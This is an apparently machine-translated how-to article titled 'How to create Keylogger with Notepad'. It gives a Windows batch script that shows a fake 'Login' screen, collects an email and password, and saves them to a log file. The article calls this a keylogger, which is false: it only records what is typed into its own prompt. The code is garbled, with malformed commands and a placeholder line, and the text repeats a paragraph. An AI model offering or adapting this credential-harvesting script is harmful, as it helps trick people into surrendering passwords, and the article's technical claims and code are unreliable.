How to create Keylogger with Notepad

Keylogger is a type of monitoring software that can record all keystroke that you perform to create a log file, usually encrypted. Each type of keylogger is dangerous because they can record your keystroke, keep track of your activities, and be able to record Open sites.

Keylogger is a type of monitoring software that can record all keystroke that you perform to create a log file, usually encrypted. Each type of keylogger is dangerous because they can record your keystroke, keep track of your activities, and be able to record Open sites.

In this way, any of your accounts may be within the scope of hackers' hacks. Keylogger can detect and detect your bank account password. And the type of keylogger can also be created with Notepad.

In the article below, Network Administrator will guide you through the steps of creating a Keylogger using Notepad.

Steps to create Keylogger with Notepad:

Step 1:

How to create Keylogger with Notepad Picture 1How to create Keylogger with Notepad Picture 1

First proceed to open Notepad on your computer by pressing the Windows key , then select Notepad .

Next copy and paste the following code into Notepad:

@echo off

color a

title Login


echo Please Enter Your Email Address And Password



cd 'C: Logs'

set / p user = Username:

set / p pass = Password:

echo Username = '% user%' Password = '% pass%' >> Log.txt

start >> Program Here <<


Step 2:

How to create Keylogger with Notepad Picture 2How to create Keylogger with Notepad Picture 2

Save the Notepad file to Logs.bat , and save it on the Desktop for easier identification.

Step 3:

How to create Keylogger with Notepad Picture 3How to create Keylogger with Notepad Picture 3

Next create a new folder, name this folder logs. (Note that the keylogger only works if your directory is named logs). Cut the folder you just created, then paste it into drive C.

Step 4:

How to create Keylogger with Notepad Picture 4How to create Keylogger with Notepad Picture 4

Next, check the Log.bat file, then enter your Username and your password.

Step 5:

How to create Keylogger with Notepad Picture 5How to create Keylogger with Notepad Picture 5

Open the folder in drive C , then see all key logs saved as an automatically generated text file.

Refer to some of the following articles:

  1. Troll friends by creating "fake" virus on Notepad
  1. Use Notepad to make the keyboard automatically type any text repeatedly
  1. Summary of useful shortcuts when using Notepad

Good luck!

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